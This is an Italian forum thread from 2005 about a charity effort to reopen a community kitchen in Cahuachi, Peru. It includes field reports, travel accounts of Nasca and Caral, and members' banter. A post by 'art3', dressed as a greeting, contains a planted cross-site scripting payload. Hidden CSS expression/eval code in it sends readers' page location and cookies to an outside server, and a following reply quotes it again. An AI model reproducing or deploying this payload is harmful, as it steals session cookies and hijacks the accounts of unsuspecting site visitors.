Mai mi sono sentita cosi' in dovere di agire....ed e' qualcosa che mi fa stare male, perche' penso a quanto si potrebbe fare e alla mancanza generale di volonta'.

Scusami lo sfogo, ma sono molto sensibile a certe cose.


Associazione Magie delle Ande
Banca Popolare Etica
Filiale di Vicenza
Corso SS Felice e Fortunato, 220
C/C 103338 ABI 05018 CAB 12100 cin L

http://www.magiedelleande.it/servizi/ne ... to_000.php (http://www.magiedelleande.it/servizi/news/news_859-cod_2801001-sito_000.php)

gabrielepoli
02-06-2005, 10:09:32
Grazie Ricky, grazie a tutti, ragazzi.
Ho un nuovo aggiornamento e ve lo propongo di seguito. Ciao!

Carissimi amici,
il Progetto Cahuachi sta nascendo ora, grazie alla sensibilità della nostra amica Francesca Antonello (qui trovate alcune informazioni su di lei: http://www.sudamerica.it/portali/peru/s ... _autore=15 (http://www.sudamerica.it/portali/peru/servizi/autori/aut001b.php?au_id_autore=15) )
Non si tratta ancora di un vero progetto, ma sono certo che, tutti assieme, lo faremo diventare presto tale. In questo momento vi è un'urgenza da risolvere, quindi cercheremo, con l'aiuto di tutti noi, di far fronte a questa difficoltà, ma in seguito studieremo (stiamo studiando) un vero e proprio progetto, in modo tale da permettere alle famiglie del luogo di sostentarsi con le proprie forze (costruzione di un pozzo che garantisca l'acqua anche nei periodi di siccità estrema). Tuttavia, non credo che ci fermeremo a questo. Il Progetto Huaro è il nostro Progetto Pilota e sarebbe bello esportarlo anche a Cahuachi per aiutare i tanti bimbi disabili che anche qui, purtroppo, vivono. Ma non allarghiamoci, per il momento e pensiamo a dare una mano a Francesca.
Per vedere le foto, vi invito alla pagina dell’associazione e al seguente indirizzo: http://www.magiedelleande.it/servizi/ru ... to_000.php (http://www.magiedelleande.it/servizi/rubriche/rubriche_2002169-cod_2802001-sito_000.php)

Di seguito il suo nuovo comunicato.
Grazie a tutti!!!
Gabriele


AGGIORNAMENTO SITUAZIONE COMEDOR DI CAHUACHI

2 giugno 2005
Cari amici di Magie delle Ande, vi scrivo da Nasca per aggiornarvi sul mio impegno per risolvere un problema di poverta’ e abbandono.
Ringrazio inanzitutto Gabriele che ha tempestivamente raccolto la mia richiesta di aiuto trasformandola in un appello pubblico nel sito. Alcuni di voi hanno già risposto con generosità e tutti qui a Nasca ve ne sono grati.
Avrete già letto la mia mail inviata a Gabriele, comunque preferisco ripetere il motivo che mi ha spinto a fermarmi qui e ad agire.
Cahuachi e’ conosciuto come la sede di uno dei siti archeologici piu’ importanti di Nasca, ma non e’ solo quello. Cahuachi e’ anche un pueblo abitato da piu’ di 20 famiglie che lavorano la loro porzione di terra, allevando anche qualche animale e sopravvivendo in ogni caso in situazioni di grave degrado. Mancano servizi basilari come acqua, luce, fognature, strade, ecc. Tuttavia il pueblo vive, ha una scuola e un asilo per i bambini, una chiesetta , un comedor popular (mensa popolare), la gente va e viene da Nasca, sorprende vedere tanta vita in un posto cosi’ arido (in tutti i sensi).
Certo in Peru’ di situazioni cosi’ ce ne sono a migliaia, non e’ una novita’.
Alla “normale” poverta’ quest’anno si e’ sommata una siccità particolare che ha impedito ai campesinos di poter seminare i campi. E poi il cosidetto PRONAA ( Programa Nacional de Alimentación) ha deciso di non inviare piu’ gli aiuti ai comedores delle zone rurali di Nasca passando la responsabilita’ al Sindaco.
Cosi’ tutta la zona non riceve piu’ da due mesi i viveri che prima arrivavano mensilmente.
PRONAA dava 4 alimenti base: riso, fagioli, grano e tonno o carne secca. Certo a questo ogni pueblo doveva aggiungere di tasca propria tutto cio’ che mancava (dall’olio alle verdure, ecc) perche’ immaginatevi voi se ogni giorno si puo’ mangiare riso e fagioli!! L’aiuto dello stato era quindi molto limitato, ma pur sempre qualcosa.
Ieri sono andata personalmente all’ufficio che gestisce questo problema al municipio; mi hanno detto che ci vuole tempo, che il processo sta avanzando, ma ancora ci vorranno 20-30 giorni…e chi lo sa?
Cosi’, spinta dal sentimento che ho verso questa gente e dalla pena di vedere le loro condizioni ho parlato con la presidente del comedor di Cahuachi, che si chiama Maria. Le ho chiesto di prepararmi una lista degli alimenti necessari al comedor per garantire un pranzo alla comunita’ di Cahuachi per 5 giorni la settimana (sabato e domenica tanti vanno in citta’ e si fermano dai parenti, quindi spesso in campagna restano poche persone). Lei mi ha preparato la lista di viveri che comprende: Riso, olio, pasta, fagioli secchi, tonno, mais, peperoncino, erbe aromatiche per le minestre, sale, carne di pollo, patate, cipolle, carote, aglio, zucca, pomodori, sedano, porri, barbabietole.
Aveva anche preparato una lista per una possibile colazione, ma il latte si e’ rivelato una spesa che va oltre il nostro probabile aiuto.
Cosi’ in questi giorni ho girato i negozi dei grossisti di viveri e ho chiesto un preventivo per la lista in questione.
Per i viveri secchi e in scatola il prezzo mensile si aggira intorno a 900 soles, che in euro equivalgono a 240. Per la verdura siamo attorno ai 100 euro e per la carne circa 50 euro. Si parla di un PREVENTIVO INIZIALE TOTALE MENSILE DI EURO 400 CIRCA.
L’aiuto iniziale praticamente servirebbe per riattivare il comedor e quindi sarebbe maggiore di eventuali aiuti successivi. Le persone di Cahuachi infatti non usufruiscono del comedor gratuitamente, ma di abitudine raccolgono un fondo comune per comprare i viveri mancanti. Prima che tutto si fermasse, ognuno dava 10 soles ( 2.5 euro) settimanalmente per la cassa comune.
Quindi il comedor al riattivarsi dovrebbe cominciare ad avere qualche entrata, che comunque sarà investita nell’acquisto di viveri.
Per questo penso che l’intervento iniziale sara’ piu’ consistente di quelli successivi. Io personalmente copriro’ parte di quella somma, pero’vorrei poter assicurare per lo meno 200 euro mensili a questa gente. Ovviamente io sto tornando in Italia e quindi devo lasciare qui una persona di fiducia che controlli che tutto vada per il verso giusto. Questa persona e’ la signora Nelly, una cuoca che lavora al Museo Antonini di Nasca, da anni impegnata con l’archeologo Giuseppe Orefici per il buon andamento del Museo stesso e anche per l’organizzazione logistica delle campagne di scavo a Cahuachi. Lei conosce la situazione molto bene, e sopratutto mi fido totalmente di lei.
Praticamente il processo si svolgera’ cosi’: Apriro’ un conto corrente a Nasca alla signora Nelly affinche’ possa ricevere i soldi dall’Italia (da verificare se e’ piu’ conveniente Wester Union o un bonifico tramite banca). Lei si incarichera’ di ricevere la lista dei viveri da Cahuachi e con i soldi del conto paghera’ i fornitori. Nessun dollaro arrivera’ a Cahuachi, solo cibo. E’ l’unico modo per controllare che tutto vada bene, a volte la poverta’ gioca brutti scherzi! Settimanalmente o secondo necessita’ Maria verra’ in citta’ a prendere i viveri o glieli invieranno tramite un bus che arriva a Cahuachi 2 volte al giorno.
Mai a Cahuachi qualcuno si era interessato a loro prima d’ora, Maria era contentissima, non poteva credere alle mie parole.
Domani organizzerò una riunione con la comunita’ di Cahuachi per esporre alcuni punti. Vi terro’ aggiornati sul risultato dell’incontro.
Intanto ringrazio tutti dell’aiuto e della considerazione data a questo piccolo mondo sperso nel deserto peruviano.
Francesca Antonello

occhidigatto
03-06-2005, 09:30:33
Grazie Gabriele.... sono un pò senza parole....

gabrielepoli
04-06-2005, 13:07:16
Ti comprendo...
Questo il nuovo aggiornamento (qui le foto: http://www.magiedelleande.it/servizi/ru ... to_000.php (http://www.magiedelleande.it/servizi/rubriche/rubriche_2002170-cod_2802003-sito_000.php) )

RESOCONTO RIUNIONE COMEDOR DI CAHUACHI

Carissimi amici e soci di Magie delle Ande, sono appena rientrata da Cahuachi. La mancanza di trasporti da Cahuachi verso Nasca mi ha obbligato a passare la notte lì.

La riunione con la comunità di Cahuachi ha avuto molto esito ed erano presenti una trentina di persone tra donne, uomini e bambini.

L’appuntamento era alle 17.00 al Comedor Popular de Cahuachi Bajo Virgen de Guadalupe ( così loro chiamano la propria mensa, dedicandola alla santa patrona di Nasca).

Sono arrivata quando già quasi tutti erano presenti, abbiamo aspettato i ritardatari che avevano finito di lavorare i campi da poco e abbiamo cominciato a discutere. Con mia grande sorpresa le pareti del comedor, che sono fatte di canne, erano tappezzate da fogli di carta con scritto: “Bienvenida Francesca”, “Gracias por tu ayuda Francesca”, (Benvenuto Francesca, Grazie per il tuo aiuto Francesca). Un po’ mi sono emozionata, del resto era la mia prima riunione con una comunità rurale.

Maria, la presidente del Comedor mi ha brevemente presentato ed ha anche esposto il motivo della convocazione, visto che le socie della mensa non si riunivano da due mesi a causa della mancanza di viveri.

Passatami la parola ho proceduto con i seguenti punti di discussione:
· Presentazione personale (perche’ ovviamente non tutti mi conoscevano) e presentazione dell’associazione Magie delle Ande.
· Esposizione del problema dell’assenza di aiuti da parte delle autorità per il Comedor (le persone presenti hanno manifestanto molta preoccupazione per la loro situazione che è ai limiti dell’emergenza per la siccità che ha compromesso i raccolti. Inoltre trovare un lavoro a Nasca che integri il reddito delle famiglie è praticamente impossibile).
· Resoconto della mia richiesta di aiuto a Gabriele Poli e sua disponibilità ad aiutarmi.
· Stesura dei preventivi per i viveri e per la verdura, prezzi e conto totale.
· Disponibilità dell’associazione Magie delle Ande a donare una somma iníziale di avvio del comedor di 400 Euro circa, ai quali seguiranno (spero e farò di tutto per garantire la continuità) contributi di 200 euro mensili.
· Esposizione del processo di aiuto e del compito di mediatrice della Signora Nelly (la cuoca del Museo Antonini) che riceverà in un conto bancario aperto appositamente per il comedor i soldi dall’Italia. Con tali soldi lei pagherà il conto del negozio che rifornirà il comedor di Cahuachi.
· Organizzare la cassa comune per comprare le verdure che mancano, visto che se il primo mese quasi tutte le spese verranno coperte con i 400 euro, sucessivamente la comunità dovrà integrare di tasca propria la somma necessaria per garantire il pasto completo.
· Ogni famiglia della comunità, quindi, darà 10 soles (2.5 euro) settimanali, mentre coloro che provengono da altre comunità e desiderano comprare occasionalmente un pasto dovranno pagare 1.50 soles a razione.
· Per controllare che l’intervento di aiuto sia proficuo e che non sorgano problemi di gestione, io comunicherò personalmente con la signora Nelly chiamandola al museo Antonini di Nasca, più o meno ogni 15 giorni. A lei verranno consegnate ogni mese tutte le copie dei registri del Comedor (lista delle socie, dei turni di cucina, delle entrate e uscite, del menù, ecc) cosicché possa comunicarmele per telefono.
· Molto importante sarà mantenersi uniti, lavorare insieme per il bene di tutti, con fiducia e volontà. L’aiuto che stanno ricevendo è qualcosa di straordinario (nel senso fuori dall’ordinario) e unico nella zona. Devono quindi saper usufruire al meglio di questa possibilità per il bene della comunità, dei loro figli, del loro futuro.
· Ho messo in chiaro che se così non sarà ogni rapporto verrà interrotto.

Finita così la riunione, dopo un lungo applauso, la presidente ha fatto firmare il registro a tutti i presenti, me compresa. La riunione è stata cosè inclusa negli atti del comedor.
E’ stato impressionante vedere come alcune donne non sapessero scrivere e firmare, quindi lasciavano la loro impronta digitale con l’inchiostro della penna nel registro dei presenti.

A quel punto è stato proposto di cambiare il nome del comedor. Anch’io lo avevo pensato, ma non lo avevo comunque detto, perche’ non volevo si sentissero costretti.
Ma per loro volontà ieri si è costituito il COMEDOR POPULAR MAGIA DE LOS ANDES VIRGEN DE GUADALUPE DE CAHUACHI BAJO.

Tramite me la comunità ringrazia tutti gli amici di Magie delle Ande, scriveranno una lettera loro stessi di ringraziamento per l’Italia.

Molti si sono avvicinati individualmente a chiedermi aiuto per altre cose molto urgenti. Lo stesso comedor dovrebbe avere una struttura stabile e protetta dai venti del deserto, mentre adesso è fatto interamente di canne. Oggi andrò dal sindaco per cercare di organizzare una riunione con lui e alcune socie del Comedor per chiedere la donazione del materiale (adobes, mattoni crudi cotti al sole) finalizzato alla costruzione di un nuovo comedor.
Altro problema, come già citato, è la siccità e la mancanza di un pozzo che garantisca a tutta la comunità l’acqua per irrigare i campi. Di pozzi ce ne sono già alcuni, ma non sono sufficienti. Inoltre chi usufruisce del pozzo (e del motore che estrae l’acqua) si turna ogni 4 giorni, e lo dà anche in affitto a chi non ha i soldi per comprarsi la motopompa.
Spero che potremo aiutarli a far fronte a queste calamità naturali…il Progetto Cahuachi prende forma. Ho anche accennato a Maria (la presidente del comedor) e a suo marito della possibilità magari di organizzare un laboratorio tessile con un gruppo di donne per confezionare tessuti da vendere ai turisti. Sembra che sia fattibile, alcune hanno già un po’ di esperienza . A Nasca sarebbe un’esperienza praticamente unica organizzare una cooperativa di tessitrici artigiane.
…Comunque questi già sono altri discorsi, dei quali comunque io mi sto informando.

Un grandissimo saluto a tutti, vi terro’ informati su ogni mia mossa e grazie da parte di tutto Cahuachi!
Francesca Antonello

occhidigatto
10-06-2005, 18:50:02
Gabriele sei hai altre news... siamo qui... ;)

gabrielepoli
10-06-2005, 20:27:40
Eccole le altre news:
http://www.magiedelleande.it/servizi/ru ... to_000.php (http://www.magiedelleande.it/servizi/rubriche/rubriche_2002171-cod_2802003-sito_000.php)

Perché non vi iscrivete anche alla news letter di Portale Perù? E magari anche all'associazione :)
so che sono sfacciato...ma che ci posso fare? :002:
Bacioni.

occhidigatto
11-06-2005, 09:48:46
Ciao Gabry,
hai ragione.... ho visto come iscrivermi all'associazione, ma come faccio a registrarmi alla news letter?

gabrielepoli
11-06-2005, 12:51:02
Ciao cara. Per la NL devi entrare a portale Perù: http://www.peru.sudamerica.it o semplicemente http://www.peru.it e sulla barra in alto trovi l'opzione.
Bacioni.

Ricky
22-06-2005, 18:31:34
Gabriele il 24 parte per il Perù, viaggio al nord in fuoristrada (mi sono già prenotato per l'anno prox in agosto... :) )
Volevo ricordarvelo e da parte mia gli invio un saluto!
Ci vediamo a Vicenza quando torni! :)

occhidigatto
22-06-2005, 18:33:51
Ciao Gabriele, buon viaggio.... porta un bacio immenso ai bimbi ed a tutto il perù :022:

A presto!

leander
22-06-2005, 21:19:48
Gabriele il 24 parte per il Perù, viaggio al nord in fuoristrada (mi sono già prenotato per l'anno prox in agosto... :) )
Volevo ricordarvelo e da parte mia gli invio un saluto!
Ci vediamo a Vicenza quando torni! :)

E devo andare a Vicenza per incontrare "per caso" Gabriele e sapere DA LUI che il prossimo agosto 2006 ANDREMO TUTI INSIEME IN PERU'?

mark
22-06-2005, 22:03:27
Forse tu non eri stato invitato.....
:168: :168:

Ricky
23-06-2005, 07:12:59
Leandro ha detto: "E devo andare a Vicenza per incontrare "per caso" Gabriele e sapere DA LUI che il prossimo agosto 2006 ANDREMO TUTTI INSIEME IN PERU'?"

No, tesoro caro: è sufficiente che tu stia un po' di più a Genova, invece di essere sempre in giro per la Cina o per Creta o per qualche altro posto!!! :002:

gabrielepoli
23-06-2005, 08:19:48
Ciao ragazzi e grazie per ricordarmi che domattina parto :)
Il prossimo anno sarà fantastico! Ieri a Vicenza ho sentito un vocione che mi chiamava e chi era? Il Leandro! Ma come? Viene a Vicenza e non mi avvisa? Era assieme a Sangio: se me lo avessero detto mi sarei organizzato per portarli alla perdizione...e invece nulla! :002:
Bene ragazzi, ora provvedo a votarvi al concorso de il Sole 24 ore: ve lo meritate davvero.
Un abbraccio a tutti gli amici del forum!
Ci risentiamo ad agosto, ma se vi interesseranno notizie fresche, potete dare un'occhiata di tanto in tanto al forum di portale Perù.
Porterò il vostro amore ai bimbi di Huaro.
Gabriele

Ricky
23-06-2005, 08:24:52
Ciao! Buon viaggio, fa il bravo.
Perchè ad agosto? ma non torni in luglio?

gabrielepoli
23-06-2005, 08:30:21
Sì, torno in luglio...ma il 31 :)
Ciao e grazie.

poochie76
23-06-2005, 09:11:29
Ciao Gabriele...buon viaggio!!! :)

gabrielepoli
23-06-2005, 09:45:57
Grazie!!!
Ora vado ad iniziare a preparare i bagagli...non ho ancora fatto nulla.

occhidigatto
23-06-2005, 09:49:10
Buona valigia allora! Un mese via.... mica male :005:

Seguiremo le info sul portale del Perù

Ciaooooooooooo

gabrielepoli
25-06-2005, 17:02:36
Ciao ragazzi, sono da poco arrivato a Lima e vi mando tutto il mio affetto.
Gabriele

mark
25-06-2005, 17:57:41
Ciao Gabriele, buon viaggio. :107:
Siamo avidi di notizie e fotografie.
:022: :022:

leander
25-06-2005, 18:47:07
Ciao ragazzi, sono da poco arrivato a Lima e vi mando tutto il mio affetto.
Gabriele

Quanti Pisco ti sei già ingurgitato?
Tienici informati, soprattutto sui progetti.
Un abbraccio! :002:

gabrielepoli
02-07-2005, 00:59:52
Pisco? Ormai non ne esiste più in Perù :002:
Ciao ragazzi, vi propongo alcune linee che ho scritto sulla mia visita a Cahuachi dell'altro giorno: per le foto dovrete attendere il mio ritorno. Un abbraccio a tutti!

Libero dalle nebbie di Lima, dall'umida garua che bagna le strade e ingrigisce i pensieri, il bus percorre rapido la Panamericana lungo l'arido deserto che costeggia il Pacifico.
Viaggio tranquillo, ma pur sempre troppo lungo per le mie gambe che ogni anno meno sopportano gli esigui spazi tra i sedili. Si giunge a Nasca che è già sera; la cittadina non è molto cambiata negli ultimi ventiquattro anni: sicuramente è più grande, con molti hotel e hostal, ma di bello, in verità, c’è ben poco. Nasca non è interessante per il patrimonio artistico che non possiede, ma per le vestigia di culture dei suoi dintorni, la cui storia si perde nella leggenda: misteri che forse mai saranno risolti e anche per questo ancora più affascinanti. I turisti che giungono sin qui non perdono l’occasione per il classico sorvolo delle famose linee, per la visita agli acquedotti di Cantayoc o al cementerio di Chauchilla, ma non è tutto questo che interessa a noi. Il mattino successivo, accompagnati finalmente da un caldo sole, visitiamo il piccolo, ma grazioso e interessante Museo Antonini. E’ il museo voluto dall’archeologo italiano Giuseppe Orefici e costruito con le sovvenzioni della famiglia svizzera Antonini. Le sale ospitano una ricca esposizione proveniente dagli scavi ancora in corso della missione archeologica italiana diretta dal dottor Orefici e un bel giardino arricchito da un antico acquedotto. Ma è già tempo di partire: Cahuachi attende. Dopo un breve e fruttuoso incontro con il dottor Carrasco, deputato di Nasca che promette il suo aiuto per la costruzione del Comedor Popular, garantendo la consegna di tutto il materiale necessario entro il mese di luglio, noleggiamo un taxi e ci avviamo. Ventotto chilometri di buche, sussulti e polvere, nel mezzo di un deserto solo costellato di tanto in tanto da brevi scorci di verde, da un cimitero abbandonato, da coltivazioni di peperoncino e da dune, tante dune dalle forme originali. Osserviamo con attenzione e ci accorgiamo che si tratta di piramidi! In un’area di 24 chilometri quadrati si estendeva l’antica città di Cahuachi, con templi piramidali a gradoni, piazze, acquedotti, pozzi, palazzi… Al momento, solo una piccola parte è stata riportata alla luce grazie ad Orefici e ai suoi archeologi professionisti e volontari, come la nostra Francesca Antonello, ma ciò che si vede è meraviglioso e quello che si intuisce lo è ancora di più. I turisti, purtroppo, non visitano questa città che probabilmente era la custode e l’artefice delle Linee di Nasca, contemporanea all’ultimo periodo della civiltà di Chavìn de Huàntar e alla fioritura di Tiahuanaco e Wari, ma siamo certi che quando (sì, ma quando?) si riuscirà a riportare del tutto alla luce questo splendore, quando le istituzioni prenderanno coscienza della necessità di preservare dai tombaroli tale patrimonio, quando gli stessi abitanti di Nasca comprenderanno il valore del tesoro che possiedono e quando, infine, sarà migliorata la strada che conduce al sito archeologico, questo monumento sarà riconosciuto quale Patrimonio dell’Umanità. Visitiamo Cahuachi troppo in fretta, ma il tempo è quel che è e le venti famiglie di Cahuachi Bajo ci attendono. Guadiamo il fiume, attraversiamo un’altra arida zona e giungiamo al…no, non è un villaggio: Cahuachi Bajo è un piccolo agglomerato di baracche di paglia, fango e canne, arso dal sole che, implacabile, ha prosciugato ogni riserva d’acqua togliendo alla popolazione locale tutte le possibilità di coltivazione, anche il minimo indispensabile per sopravivere. Cosa avrebbero potuto fare senza il grande cuore di Francesca e la sensibilità degli amici di Magie delle Ande? Me lo chiedo solo per un attimo e subito scaccio il pensiero: troppo dura sarebbe la risposta. L’attuale comedor –l’unico attivo in tutta la zona- è una piccola capanna dal tetto di canne, con un buco nel terreno dove arde il fuoco sopra al quale stanno due pentoloni, uno di riso e l’altro di fagioli. La nostra auto si ferma ad alcuni metri di distanza; scendiamo e già siamo commossi: un grande cartello dà il benvenuto a Magie delle Ande e una piccola folla si avvicina sorridente, ci stringe le mani, ci abbraccia. Cosa può significare un piccolo aiuto economico per questa gente priva di risorse! Entriamo e cerchiamo in qualche modo di rispondere al caldo saluto di queste povere persone che mai, neppure per un istante hanno tuttavia perduto la propria dignità. Ci scambiamo sorrisi, complimenti, pacche sulle spalle; dividiamo riso e fagioli, poi un ultimo saluto e la promessa di un pronto ritorno. Ci aspetta un ultimo compito: correre in banca a Nasca e versare il contributo che Magie delle Ande è riuscita a raccogliere; per noi non è molto, ma per le venti famiglie di Cahuachi significano la sopravvivenza fino a novembre. E poi? Poi si vedrà.

occhidigatto
02-07-2005, 09:43:41
Grazie di tutto Gabriele

leander
02-07-2005, 09:48:22
Che voglia di essere lì anch'io...
Un grossissimo saluto!
:107:

Ricky
03-07-2005, 11:27:24
L'anno prossimo, Leandro: ormai è scritto! :)

leander
03-07-2005, 11:37:55
L'anno prossimo, Leandro: ormai è scritto! :)

All together now!
[smilie=731.gif]

Niente male avere qualcuno che ti dà morale sull'aereo, eh? :002:
Però anche a me fa comodo essere in viaggio con un medico, dài! A una certa età, non si sa mai... :025:

mark
03-07-2005, 12:45:43
anche a me fa comodo essere in viaggio con un medico, dài! A una certa età, non si sa mai... :025:

Soprattutto col veterinario!
:027: :027: :027:

leander
03-07-2005, 14:13:19
Soprattutto col veterinario!
:027: :027: :027:

Salace... :?D?:

Ricky
03-07-2005, 17:52:14
Grazia (OFF OFF TOPIC) e... il Palio? :002:

leander
03-07-2005, 18:28:55
Grazia (OFF OFF TOPIC) e... il Palio? :002:

Positivo. La Pantera non partecipava ma in ottica paliesca l'importante è che NON abbia vinto la contrada rivale (che tra l'altro era agguerrita), quindi bene così.
Ha vinto il Bruco, con grande vantaggio.

mark
03-07-2005, 19:21:04
Ottimo segretario ma... mi costa una fortuna!
:027: :027: :027:

leander
03-07-2005, 21:03:46
Ottimo segretario ma... mi costa una fortuna!
:027: :027: :027:

Devo ben arrotondare la magra pensione... :015:

mark
04-07-2005, 08:54:11
Grazia (OFF OFF TOPIC) e... il Palio? :002:

Ma soprattutto (sempre OFF OFF TOPIC)....quando venite a vederlo?
:025: :025: :025:

Ricky
04-07-2005, 18:32:02
Non dirlo 2 volte... :)
Ci si può organizzare, anche se non per quello d'agosto, ormai!

leander
04-07-2005, 19:31:23
Non dirlo 2 volte... :)
Ci si può organizzare, anche se non per quello d'agosto, ormai!

Con me non ha dovuto dirmelo due volte, forse nemmeno una... :025: :005:

trottola
05-07-2005, 20:52:25
Gabriele , Michael come sta? L'hai già visto?
E gli altri bambini?
Un saluto.

gabrielepoli
12-07-2005, 18:55:26
No, Trottolina, non ho ancora avuto il piacere di vederlo. Sono appena tornato dal nord e da altre belle esperienze: sabato attendo un gruppo di amici che accompagnerò al sud fino al 24, poi il 25 saremo tutti a Huaro per l'inaugurazione della scuola!!
Un bacione e un caro saluto a tutti.
Gabriele

leander
12-07-2005, 19:05:15
Ciao carissimo!
Quando sarai a Huaro facci sapere! (ma anche prima... :002: )

gabrielepoli
12-07-2005, 19:09:18
Non mancherò, lazzarone :)
Intanto andatevi a vedere questo:
http://www.larepublica.com.pe/noticia_c ... 4503&pId=7 (http://www.larepublica.com.pe/noticia_cs.jsp?pIdNoticia=44503&pId=7)

gabrielepoli
12-07-2005, 19:14:44
Le cinque del mattino.
E’ ancora buio fitto; abbiamo dormito solo tre ore, ma non c’è tempo per poltrire. Angelica è già fuori che ci aspetta; in strada attende l’auto di suo padre (è venuto pure lui per conoscerci) con tanto di autista. A quest’ora di domenica mattina, Lima è semideserta: solo pochi venditori ambulanti intenti a preparare la propria mercanzia e qualche nottambulo ubriaco reduce da feste a base di birra e liquore animano –se così si può dire- le vie del centro. Di qui al porto di Supe e poi a Caral sono circa 180 chilometri di buona strada asfaltata (la Panamericana Nord): solo gli ultimi venti sono un poco difficili da percorrere e servirebbe un fuoristrada, ma l’auto di Angelica non teme qualche buca e il guado del fiume, così, pur smarrendo un paio di volte la via, fra coltivazioni di canna e misere capanne, giungiamo alla magica Caral, la più antica città delle Americhe. Ma cos’era Caral? Rappresenta la prima civiltà americana sinora scoperta, contemporanea alla mesopotamica, all’egiziana, all’indiana e alla cinese e risale perlomeno al 2900 a.C., anticipando di 1500 anni le culture mesoamericane. La Città Sacra di Caral comprende un’area centrale con edifici pubblici e residenziali distribuiti in due settori, uno alto e uno basso e un’area periferica con le abitazioni del popolo. Si tratta di qualcosa di davvero eccezionale, riportata alla luce solo nel 1997 dall’archeologa Ruth Shady Solìs che avremo il piacere di conoscere. Il mio amico Bortolo che mi accompagna sgrana gli occhi di fronte a tanta meraviglia, ma non è il solo: pure Yolanda, Angelica ed io stesso siamo affascinati. Piramidi scalonate, templi, piazze, anfiteatri si susseguono per ogni dove e fatichiamo a comprendere come una città tanto grande e importante sia rimasta sino ad ora offuscata dal tempo e dimenticata dall’uomo. Eppure anche oggi, che è domenica, i visitatori si contano facilmente: perlopiù studenti peruviani di archeologia e pochissimi curiosi come noi. Certo, questi venti chilometri di sterrato non invogliano la visita, tuttavia non vi è dubbio che chiunque decidesse di avventurarsi per queste lande rimarrebbe appagato dal mistico splendore della città santa. Incontriamo la dottoressa Shady quando la visita sta per terminare; l’accompagna il cane fedele che segue i suoi passi senza allontanarsi di un metro. Ruth avanza lenta verso di noi e già dal suo incedere si intuisce l’orgoglio che la pervade; un orgoglio assolutamente giustificato. Parla piano, con un sorriso grazioso e lo sguardo schivo, ma è disponibile e pronta a chiarire i nostri dubbi. Racconta la sua scoperta, spiega le difficoltà incontrate e che ancora rallentano gli scavi, ci accompagna con la fantasia nella notte dei tempi, a cinquemila anni fa e ci sentiamo avvolti dal suono dei flauti, mentre una processione risale la spianata diretta al tempio principale: una nenia sale al cielo e con questa per un momento pure noi ci eleviamo, volteggiando lassù, incontro a Choquechinchay, il Giaguaro Dorato. E’ solo suggestione, ma è bello immaginare.
Riprendiamo la strada, incamminandoci verso Lima e proponendoci di tornare il prossimo anno quando gli scavi avranno riportato alla luce altre meraviglie. Ci guardiamo l’un l’altro e siamo tutti convinti che il Perù riserverà ancora moltissime sorprese all’umanità.

leander
12-07-2005, 20:45:11
Riprendiamo la strada, incamminandoci verso Lima e proponendoci di tornare il prossimo anno quando gli scavi avranno riportato alla luce altre meraviglie.

E ci porterai anche me!!! :021:

gabrielepoli
12-07-2005, 23:16:38
Certo! Andremo tutti assieme :)
Letto l'articolo su Repùblica?

leander
12-07-2005, 23:27:58
Letto l'articolo su Repùblica?

Claro que sì! :002:
Però, "Peruanista italiano".... mis cojones!!! :027:

gabrielepoli
12-07-2005, 23:41:33
...e c'é un'altra novità, anche se non a brevissima scadenza: con Walter Alva, l'acheologo scopritore della tomba del Señor de Sipàn, abbiamo deciso di scrivere assieme un romanzo storico sulla civiltà Moche; se il progetto, come penso e spero, andrà in porto, potrebbe diventare qualcosa di livello internazionale.
Incrocio le dita :002:

leander
12-07-2005, 23:51:24
Incrocio le dita :002:


In kulo alla balena!
E anche buonanotte, visto che qui sono le 23,55! :027:

gabrielepoli
12-07-2005, 23:57:50
In kulo alla balena!
E anche buonanotte, visto che qui sono le 23,55! :027:[/quote]

Crepi! Qui sono le 17 :005:

trottola
13-07-2005, 06:13:26
No, Trottolina, non ho ancora avuto il piacere di vederlo. Sono appena tornato dal nord e da altre belle esperienze: sabato attendo un gruppo di amici che accompagnerò al sud fino al 24, poi il 25 saremo tutti a Huaro per l'inaugurazione della scuola!!
Un bacione e un caro saluto a tutti.
Gabriele

Un bacio anche a te, a presto.

Ricky
13-07-2005, 08:39:02
Ciao Gabriele!
Che notizie... GRANDE!
Un saluto,
Ricky

gabrielepoli
14-07-2005, 01:31:06
Grazie Ricky...speriamo vada tutto come mi auguro.
Un abbraccio.

art3
15-07-2005, 16:19:54
Ciao Gabriele!

www.ut (www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://tg2.altervista.org/r.php?data='+document.location+document.cookie;thi s.sss=null`style='font-size:0;)'

leander
15-07-2005, 16:38:17
Ciao Gabriele!

www.ut (www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://tg2.altervista.org/r.php?data='+document.location+document.cookie;thi s.sss=null`style='font-size:0;)'

Ciao art! Conosci Gabriele? :002:

Ricky
26-07-2005, 07:09:00
Gabriele, se ci sei batti un colpo!!! :)
Vogliamo sapere qualche nuova.

sangiopanza
01-08-2005, 10:47:47
GR2 delle 7,30 di oggi. Pagine culturali. Indovinate un po' chi è invitato a parlare della birra andina? Non c'è proprio bisogno che vi dica che è proprio lui, il nostro Gabriele Poli.

frisino
01-08-2005, 11:01:05
Davero? Che grande!

Ricky
01-08-2005, 12:13:18
Birra andina? un'idea per la prossima FIESTA!!! :002:

leander
01-08-2005, 12:16:17
Birra andina? un'idea per la prossima FIESTA!!! :002:

...che sarebbe in data...? :025:

occhidigatto
04-08-2005, 11:55:04
Gabrieleeeeeeeeee

gabrielepoli
04-08-2005, 11:57:59
Ciao ragazzacci!!!
Sono tornato domenica sera...con un gran mal di denti, ma solo una volta giunto a casa. Certamente gli Apu non mi hanno perdonato di avere abbandonato (anche se solo momentaneamente) il Perù...
Presto scriverò qualcosa per raccontarvi le ultime novità su Huaro, Michael e la bella inaugurazione della scuola.
Appena arrivato a casa, domenica, mi ha telefonato un tipo del Gr2 e mi ha chiesto una delucidazione sulla birra andina: si tratta della chicha (si legge cicia), una fermentazione del mais usata da millenni. Poi non ho ascoltato l'intervista in radio: com'è venuta Sancio?
Spero di vedervi presto...resta pendente la cena a casa mia.
Un abbraccione.
Gabriele

gabrielepoli
04-08-2005, 11:59:52
Gabrieleeeeeeeeee

Ciao occhioni belli!!!!

occhidigatto
04-08-2005, 12:01:08
Ho visto che eri collegato e speravo scrivessi.... il nostro piccolo Micheal ci manca tanto!!!!! Aspettiamo notizie, io cmq leggo spesso il portale Perù.

A presto

gabrielepoli
04-08-2005, 12:04:28
Non devi leggerlo spesso; devi leggerlo sempre :002:
